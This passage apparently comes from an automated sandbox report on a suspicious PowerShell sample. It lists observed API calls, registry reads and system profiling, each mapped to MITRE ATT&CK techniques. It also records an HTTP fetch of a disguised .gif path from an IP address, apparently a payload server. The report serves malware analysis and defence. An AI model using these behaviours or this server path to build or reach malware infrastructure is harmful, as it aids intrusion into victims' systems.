\"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LOGFILENAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1507714c24a00fefffffff5f65477634d557768a128001015a56b8808a500b2f454775821cf77fcebd1000000a46b0000a46b804d55773c21cf77f0000000f000a46b0000000068ebd1005c004300fcecd1000000000001000000ccebd10040f554770000000000000000b8ebd100 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000000000000880000000000000068ebd100459dc375000047000000000080000000020000000000d200dc1aa46b7cebd100 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebf57598c91f0400b0fd7f9a5c557700f0fa7fa8d5140544b0fd7f00000000400000003f0000002500000000b0fd7f9cd51405c15c557760825c772500000000b0fd7f9a5c557700f0fa7fc0d514055789547780835c7713175675d8ebf575 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100771a00000014150a720400000040e9190498922600b8932600c0f01904c067270095e1507774df1405fefffffface0140595e15077ecd64a00feffffffff2b54779a2a5477d0e01405d8e11405f8e01405340000c044e01405e7385477ec385477b82a0a72340000c0f8e01405d8e11405 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec38547714150a72fce01405105e537730e01405c0df14051c5e53773ce1140595e150778cd24a00feffffffec38547761d64076340000c05d0dfe75e8e114056ed640764804000024e114052ce11405ff2b547728e1140502000000000000000000000048040000407e210430e01405 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec38547714150a72fce01405105e537730e01405c0df14051c5e53773ce1140595e150778cd24a00feffffffec38547761d64076340000c05d0dfe75e8e114056ed640764804000024e114052ce11405ff2b547728e1140502000000000000000000000048040000a082210430e01405 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec38547714150a72fce01405105e537730e01405c0df14051c5e53773ce1140595e150778cd24a00feffffffec38547761d64076340000c05d0dfe75e8e114056ed640764804000024e114052ce11405ff2b547728e11405020000000000000000000000480400000087210430e01405 (UID: 00000000-00006096)\n \"csc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000bc704800d0644b00c874480095c2557500fc2a000000000058fd2a0095e150779f114a00feffffffff2b54779a2a5477000000002400000088094c0000004800a8984b00c2984b006718c40000000000d0644b0088094c0029f3a4a5e8fc2a0000924b0001000000a0984b00e0fc2a00 (UID: 00000000-00005220)\n \"csc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000c742d6b60932d6b54dc2a00a44e2c6b60932d6bf3c05468010000000100000008c15468904e2c6b89732d6b94dc2a00fb692d6b00000000ef692d6b7e80c0a5010000000100000000000000c8dd2a000000000064dc2a0070dc2a00d4dc2a00e06b2d6b22c9c7cefeffffffef692d6b (UID: 00000000-00005220)\n \"csc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002a16003c56380000c4004800 (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00006096-00000C29-3365438437\")\n Found reference to API \"EnumWindowsW\" (Indicator: \"enumwindows\"; Source: \"00000000-00006096-00000C29-3365439068\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00006096-00000C29-3365176540\")\n Found string \"NtQuerySystemInformationW\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00006096-00000C29-3366828961\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"cmd.exe\" called \"IsWow64Process\" with parameter \"2724\" - (UID: 00000000-00002724)\n \"powershell.exe\" called \"IsWow64Process\" with parameter \"6096\" - (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002724)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002724)\n \"powershell.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"powershell.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000780126000000000024000000000000005001260038000000b0462a0000000000380000000000000014000000000000000000000000000000000000000000000002000002602c29006e00006e000000000000000000000000800000000000000027350012a89229000100000000000000020000000c000000a83c2900a83c2900a33c290000000000000000000000260000000001a4f0060000000000c4f6060095e15077d4d84a00feffffff435c54775059547794000000a0000000a23c2900a03c29009400000048f20600fdfe407618000000e7c2ab9dc386856b78030600 (UID: 00000000-00006096)\n \"powershell.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"powershell.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f4e9d10000000000050000000000a46b20ead1000200004024ecd10024ecd1001a125677000000000cead1000000000068b428000203567700020000880156770000000068ecd100a401567700000000626f547764f854774420cf775411a46b18ebd1000000000000004f773ff000005411a46b0000000000000000e03d26005cead100b69f547700000000000052746c496e697469616c697a65437269746963616c53656374696f6e00000000a46b0000000000000000000000005420cf7710ead1000000000070eed1004420cf7728ead1000200000040ebd100ff2b5477 (UID: 00000000-00006096)\n \"powershell.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b00dd0000000000000000000000000000000000000015001600dd0000000000000000000000d8fd260000000000200000000000000002000000b058300098922600b893260050a2310090ff26000000000064e9d1009c01000078ebd10095e15077ecd64a00feffffffff2b54779a2a54773020a56b94110000000000000c02470000004700500147000000000000000000500147000000000080014700000000009c01000000000000500147007f00000080624700000000007f0000000000000011000000000000000000000002000000000000003020a56b50a231003020a56b (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"powershell.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"powershell.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"powershell.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\Users (UID: 00000000-00002724)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002724)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter %USERPROFILE%\\Desktop (UID: 00000000-00002724)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter 36eaccfde177c2e7b93b8dbdde4e012a (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter d254c63bedcb76c81c3125bd527b7d1a (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter 0b2f69b43a576b9edcc807a30872bd91 (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter 2c3c912ea8f058f9d04c4650128feb3f (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter 31fae3290fad30c31c98651462d22724 (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter 73a1a80aed03e789a49cec899b7505dd (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter e114780fd3ea5727401c06ea4f22ef35 (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\* (UID: 00000000-00006096)\n \"powershell.exe\" called \"FindNextFileW\" with parameter 2e76676fbd265f70be92c82bbf76b8e5 (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"powershell.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"powershell.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"http://go.microsoft.com/fwlink/?linkid=533240\"\n Pattern match: \"muid34de7de8b33b6a7207b86867b2776bbemicrosoft.com/1025282798528031239695344918098031161232_edge_vmicrosoft.com/9216282798528031239695344933698031161232srchdaf=noformmicrosoft.com/1024424480806431308091344933698031161232srchuidv=2&guid=8f1cdf4999ce49199912d\"\n Pattern match: \"59zwww.msn.com/1024424480806431308091345432898931161232muidb3385f48c1d1063371348e1031c5c62e9www.msn.com/9216282798528031239695345448498931161232\"\n Pattern match: \"muid34de7de8b33b6a7207b86867b2776bbemicrosoft.com/1025282798528031239695344918098031161232_edge_vmicrosoft.com/9216282798528031239695344933698031161232srchdaf=noformmicrosoft.com/1024424480806431308091344933698031161232\"\n Pattern match: \"muid34de7de8b33b6a7207b86867b2776bbemicrosoft.com/1025282798528031239695344918098031161232_edge_vmicrosoft.com/9216282798528031239695344933698031161232\"\n Pattern match: \"59zwww.msn.com/1024424480806431308091345432898931161232\"\n Pattern match: \"9216282798528031239695345448498931161232muid3385f48c1d1063371348e1031c5c62e9msn.com/1025282798528031239695345432898931161232\"\n Pattern match: \"muidb34de7de8b33b6a7207b86867b2776bbeieonline.microsoft.com/9216282798528031239695344933698031161232\"\n Pattern match: \"muid34de7de8b33b6a7207b86867b2776bbemicrosoft.com/1025282798528031239695344918098031161232\"\n Pattern match: \"muid3385f48c1d1063371348e1031c5c62e9msn.com/1025282798528031239695345432898931161232\"\n Heuristic match: \"ctldl.windowsupdate.com\"\n Pattern match: \"http://<IPv4>/430/goodgirlalwaysbeagoodgirlwithbetterpersongood.gif\"\n Heuristic match: \"%windir%\\microsoft.net\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"powershell.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"http://<IPv4>/430/goodgirlalwaysbeagoodgirlwithbetterpersongood.gIF\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-190", "type": 6, "relevance": 2, "name": "Calls an API typically used to send the specified request to the HTTP server", "description": "\"powershell.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"42178a8\"\n \"lpszHeaders\": \"If-None-Match: \\\"084627641cfd61:0\\\"If-Modified-Since: Thu, 10 Dec 2020 22:11:52 GMT\"\n \"dwHeadersLength\": \"4294967295\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"}\n \"powershell.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"4225780\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-191", "type": 6, "relevance": 2, "name": "Calls an API typically used to to receive the response to a HTTP requests", "description": "\"powershell.exe\" called \"WinHttpReceiveResponse\" with parameters {\"hRequest\": \"42178a8\"\n \"lpReserved\": \"0\"}\n \"powershell.exe\" called \"WinHttpReceiveResponse\" with parameters {\"hRequest\": \"4225780\"\n \"lpReserved\": \"0\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /430/goodgirlalwaysbeagoodgirlwithbetterpersongood.gIF\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "api-229", "type": 6, "relevance": 3, "name": "Calls an API typically used to convert data from string to binary", "description": "\"powershell.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"MIIbVQYJKoZIhvcNAQcCoIIbRjCCG0ICAQExCzAJBgUrDgMCGgUAMGkGCisGAQQBgjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNRAgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU+zz3vaNz0s6W8CREgPojmh03NLSgghYqMIIEEjCCAvqgAwIBAgIPAMEAizw8iBHRPvZj7N9AMA0GCSqGSIb3DQ\"\n \"cchString\": \"9628\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"30821b5506092a864886f70d010702a0821b4630821b42020101310b300906052b0e03021a05003069060a2b060104018237020104a05b30593034060a2b06010401823702011e3026020301000004101fcc3b60594b084eb724d2c6297ef3510201000201000201000201000201003021300906052b0e03021a05000414fb3cf7bda373d2ce96f0244480fa239a1d3734b4a082162a30820412308202faa003020102020f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d01010405003070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479301e170d3937303131303037303030305a170d3230313233313037303030305a3070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100a902bdc170e63bf24e1b289f97785e30eaa2a98d255ff8fe954ca3b7fe9da2203e7c51a29ba28f60326bd1426479eeac76c954daf2eb9c861c8f9f8466b3c56b7a6223d61d3cde0f0192e896c4bf2d669a9a682699d03a2cbf0cb55826c146e70a3e38962ca92839a8ec498342e3840fbb9a6c5561ac827ca1602d774ce999b4643b9a501c310824149fa9e7912b18e63d986314605805659f1d375287f7a7ef9402c61bd3bf5545b38980bf3aec54944eaefda77a6d744eaf18cc96092821005790606937bb4b12073c56ff5bfba4660a08a6d2815657efb63b5e16817704daf6beae8095feb0cd7fd6a71a725c3ccabcf008a32230b30685c9b320771385df0203010001a381a83081a53081a20603551d0104819a30819780105bd070ef69729e23517e14b24d8effcba1723070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479820f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d0101040500038201010095e80bc08df3971835edb80124d87711f35c60329f9e0bcb3e0591888fc93ae621f2f057932cb5a047c862effcd7cc3b3b5aa9365469fe246d3fc9ccaade057cdd318d3d9f10706abbfe124f1869c0fcd043e311\"\n \"pcbBinary\": \"591b0000\"\n \"pdwFlags\": \"01000000\"}\n \"powershell.exe\" called \"CryptStringToBinaryW\" with parameters {\"pszString\": \"MIIbVQYJKoZIhvcNAQcCoIIbRjCCG0ICAQExCzAJBgUrDgMCGgUAMGkGCisGAQQBgjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR\"\n \"cchString\": \"9628\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"30821b5506092a864886f70d010702a0821b4630821b42020101310b300906052b0e03021a05003069060a2b060104018237020104a05b30593034060a2b06010401823702011e3026020301000004101fcc3b60594b084eb724d2c6297ef3510201000201000201000201000201003021300906052b0e03021a05000414fb3cf7bda373d2ce96f0244480fa239a1d3734b4a082162a30820412308202faa003020102020f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d01010405003070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479301e170d3937303131303037303030305a170d3230313233313037303030305a3070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100a902bdc170e63bf24e1b289f97785e30eaa2a98d255ff8fe954ca3b7fe9da2203e7c51a29ba28f60326bd1426479eeac76c954daf2eb9c861c8f9f8466b3c56b7a6223d61d3cde0f0192e896c4bf2d669a9a682699d03a2cbf0cb55826c146e70a3e38962ca92839a8ec498342e3840fbb9a6c5561ac827ca1602d774ce999b4643b9a501c310824149fa9e7912b18e63d986314605805659f1d375287f7a7ef9402c61bd3bf5545b38980bf3aec54944eaefda77a6d744eaf18cc96092821005790606937bb4b12073c56ff5bfba4660a08a6d2815657efb63b5e16817704daf6beae8095feb0cd7fd6a71a725c3ccabcf008a32230b30685c9b320771385df0203010001a381a83081a53081a20603551d0104819a30819780105bd070ef69729e23517e14b24d8effcba1723070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479820f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d0101040500038201010095e80bc08df3971835edb80124d87711f35c60329f9e0bcb3e0591888fc93ae621f2f057932cb5a047c862effcd7cc3b3b5aa9365469fe246d3fc9ccaade057cdd318d3d9f10706abbfe124f1869c0fcd043e311\"\n \"pcbBinary\": \"591b0000\"\n \"pdwFlags\": \"01000000\"}", "origin": "API Call", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Commandline contains long base64 encoded string", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"powershell.exe\" (Access type: \"CREATE\"; Path: 